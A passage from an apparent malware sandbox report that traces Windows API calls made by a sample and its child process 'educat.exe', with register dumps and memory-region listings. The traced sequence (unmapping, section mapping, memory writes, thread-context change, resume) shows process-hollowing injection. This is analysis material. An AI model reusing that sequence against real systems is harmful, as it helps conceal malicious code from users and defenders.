[225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0047.615] ReadProcessMemory (in: hProcess=0x17c, lpBaseAddress=0x7ffde008, lpBuffer=0x190f94, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x190f94*, lpNumberOfBytesRead=0x0) returned 1 [0047.615] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x190b20 | out: Wow64Process=0x190b20) returned 1 [0047.619] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0047.619] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x176638 [0047.620] VirtualAlloc (lpAddress=0x0, dwSize=0x176638, flAllocationType=0x3000, flProtect=0x4) returned 0x1f30000 [0047.620] ReadFile (in: hFile=0x184, lpBuffer=0x1f30000, nNumberOfBytesToRead=0x176638, lpNumberOfBytesRead=0x190a58, lpOverlapped=0x0 | out: lpBuffer=0x1f30000*, lpNumberOfBytesRead=0x190a58*=0x176638, lpOverlapped=0x0) returned 1 [0047.695] VirtualAlloc (lpAddress=0x0, dwSize=0x179000, flAllocationType=0x3000, flProtect=0x4) returned 0x20b0000 [0047.722] CloseHandle (hObject=0x184) returned 1 [0047.722] VirtualFree (lpAddress=0x1f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0047.730] VirtualFree (lpAddress=0x20b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0047.738] NtUnmapViewOfSection (ProcessHandle=0x17c, BaseAddress=0x400000) returned 0x0 [0047.740] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x190adc | out: Wow64Process=0x190adc) returned 1 [0047.744] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0047.744] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x176638 [0047.744] VirtualAlloc (lpAddress=0x0, dwSize=0x176638, flAllocationType=0x3000, flProtect=0x4) returned 0x1f30000 [0047.744] ReadFile (in: hFile=0x184, lpBuffer=0x1f30000, nNumberOfBytesToRead=0x176638, lpNumberOfBytesRead=0x190a14, lpOverlapped=0x0 | out: lpBuffer=0x1f30000*, lpNumberOfBytesRead=0x190a14*=0x176638, lpOverlapped=0x0) returned 1 [0047.775] VirtualAlloc (lpAddress=0x0, dwSize=0x179000, flAllocationType=0x3000, flProtect=0x4) returned 0x20b0000 [0047.810] CloseHandle (hObject=0x184) returned 1 [0047.810] VirtualFree (lpAddress=0x1f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0047.818] VirtualFree (lpAddress=0x20b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0047.827] NtCreateSection (in: SectionHandle=0x190b18, DesiredAccess=0xe, ObjectAttributes=0x0, MaximumSize=0x190f80, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x190b18*=0x184) returned 0x0 [0047.827] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x190ab0 | out: Wow64Process=0x190ab0) returned 1 [0047.831] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0047.831] GetFileSize (in: hFile=0x180, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x176638 [0047.831] VirtualAlloc (lpAddress=0x0, dwSize=0x176638, flAllocationType=0x3000, flProtect=0x4) returned 0x1f30000 [0047.831] ReadFile (in: hFile=0x180, lpBuffer=0x1f30000, nNumberOfBytesToRead=0x176638, lpNumberOfBytesRead=0x1909e8, lpOverlapped=0x0 | out: lpBuffer=0x1f30000*, lpNumberOfBytesRead=0x1909e8*=0x176638, lpOverlapped=0x0) returned 1 [0047.857] VirtualAlloc (lpAddress=0x0, dwSize=0x179000, flAllocationType=0x3000, flProtect=0x4) returned 0x20b0000 [0047.882] CloseHandle (hObject=0x180) returned 1 [0047.883] VirtualFree (lpAddress=0x1f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0047.891] VirtualFree (lpAddress=0x20b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0047.899] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x17c, BaseAddress=0x190b0c*=0x400000, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x190ab4*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x190b0c*=0x400000, SectionOffset=0x0, ViewSize=0x190ab4*=0x71000) returned 0x0 [0047.900] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x190ab0 | out: Wow64Process=0x190ab0) returned 1 [0047.904] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0047.904] GetFileSize (in: hFile=0x180, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x176638 [0047.904] VirtualAlloc (lpAddress=0x0, dwSize=0x176638, flAllocationType=0x3000, flProtect=0x4) returned 0x1f30000 [0047.905] ReadFile (in: hFile=0x180, lpBuffer=0x1f30000, nNumberOfBytesToRead=0x176638, lpNumberOfBytesRead=0x1909e8, lpOverlapped=0x0 | out: lpBuffer=0x1f30000*, lpNumberOfBytesRead=0x1909e8*=0x176638, lpOverlapped=0x0) returned 1 [0047.928] VirtualAlloc (lpAddress=0x0, dwSize=0x179000, flAllocationType=0x3000, flProtect=0x4) returned 0x20b0000 [0047.955] CloseHandle (hObject=0x180) returned 1 [0047.956] VirtualFree (lpAddress=0x1f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0047.963] VirtualFree (lpAddress=0x20b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0047.971] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0xffffffffffffffff, BaseAddress=0x190b0c*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x190ab4*=0x71000, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x190b0c*=0x1f30000, SectionOffset=0x0, ViewSize=0x190ab4*=0x71000) returned 0x0 [0047.977] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x190af4 | out: Wow64Process=0x190af4) returned 1 [0047.982] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0047.982] GetFileSize (in: hFile=0x180, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x176638 [0047.982] VirtualAlloc (lpAddress=0x0, dwSize=0x176638, flAllocationType=0x3000, flProtect=0x4) returned 0x1fb0000 [0047.982] ReadFile (in: hFile=0x180, lpBuffer=0x1fb0000, nNumberOfBytesToRead=0x176638, lpNumberOfBytesRead=0x190a2c, lpOverlapped=0x0 | out: lpBuffer=0x1fb0000*, lpNumberOfBytesRead=0x190a2c*=0x176638, lpOverlapped=0x0) returned 1 [0048.007] VirtualAlloc (lpAddress=0x0, dwSize=0x179000, flAllocationType=0x3000, flProtect=0x4) returned 0x2130000 [0048.032] CloseHandle (hObject=0x180) returned 1 [0048.032] VirtualFree (lpAddress=0x1fb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0048.040] VirtualFree (lpAddress=0x2130000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0048.048] NtWriteVirtualMemory (in: ProcessHandle=0x17c, BaseAddress=0x7ffde008, Buffer=0x190c90*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x190af8 | out: Buffer=0x190c90*, NumberOfBytesWritten=0x190af8*=0x4) returned 0x0 [0048.048] SetThreadContext (hThread=0x178, lpContext=0x190cb0*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7ffde000, Edx=0x0, Ecx=0x0, Eax=0x40168d, Ebp=0x0, Eip=0x77d0aef0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0048.049] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x190b2c | out: Wow64Process=0x190b2c) returned 1 [0048.053] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0048.054] GetFileSize (in: hFile=0x180, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x176638 [0048.054] VirtualAlloc (lpAddress=0x0, dwSize=0x176638, flAllocationType=0x3000, flProtect=0x4) returned 0x1fb0000 [0048.054] ReadFile (in: hFile=0x180, lpBuffer=0x1fb0000, nNumberOfBytesToRead=0x176638, lpNumberOfBytesRead=0x190a50, lpOverlapped=0x0 | out: lpBuffer=0x1fb0000*, lpNumberOfBytesRead=0x190a50*=0x176638, lpOverlapped=0x0) returned 1 [0048.079] VirtualAlloc (lpAddress=0x0, dwSize=0x179000, flAllocationType=0x3000, flProtect=0x4) returned 0x2130000 [0048.104] CloseHandle (hObject=0x180) returned 1 [0048.104] VirtualFree (lpAddress=0x1fb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0048.112] VirtualFree (lpAddress=0x2130000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0048.119] NtResumeThread (in: ThreadHandle=0x178, SuspendCount=0x190b30 | out: SuspendCount=0x190b30*=0x1) returned 0x0 [0048.439] CloseHandle (hObject=0x17c) returned 1 [0048.439] CloseHandle (hObject=0x178) returned 1 [0048.439] CloseHandle (hObject=0x184) returned 1 [0048.439] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x190b20 | out: Wow64Process=0x190b20) returned 1 [0048.442] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0048.443] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x176638 [0048.443] VirtualAlloc (lpAddress=0x0, dwSize=0x176638, flAllocationType=0x3000, flProtect=0x4) returned 0x1fb0000 [0048.443] ReadFile (in: hFile=0x184, lpBuffer=0x1fb0000, nNumberOfBytesToRead=0x176638, lpNumberOfBytesRead=0x190a58, lpOverlapped=0x0 | out: lpBuffer=0x1fb0000*, lpNumberOfBytesRead=0x190a58*=0x176638, lpOverlapped=0x0) returned 1 [0048.526] VirtualAlloc (lpAddress=0x0, dwSize=0x179000, flAllocationType=0x3000, flProtect=0x4) returned 0x2130000 [0048.551] CloseHandle (hObject=0x184) returned 1 [0048.551] VirtualFree (lpAddress=0x1fb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0048.557] VirtualFree (lpAddress=0x2130000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0048.770] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x1f30000) returned 0x0 [0048.774] ExitProcess (uExitCode=0x0) Thread: id = 2 os_tid = 0xd64 Process: id = "2" image_name = "educat.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\educat.exe" page_root = "0x30c4c000" os_pid = "0xda4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xd50" cmd_line = "\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\educat.exe\" " cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00014ee5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 205 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 206 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 207 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 208 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 209 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 210 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 211 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 212 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 213 start_va = 0x400000 end_va = 0x512fff entry_point = 0x400000 region_type = mapped_file name = "educat.exe" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\educat.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\educat.exe") Region: id = 214 start_va = 0x77ca0000 end_va = 0x77e18fff entry_point = 0x77ca0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 215 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 216 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 217 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 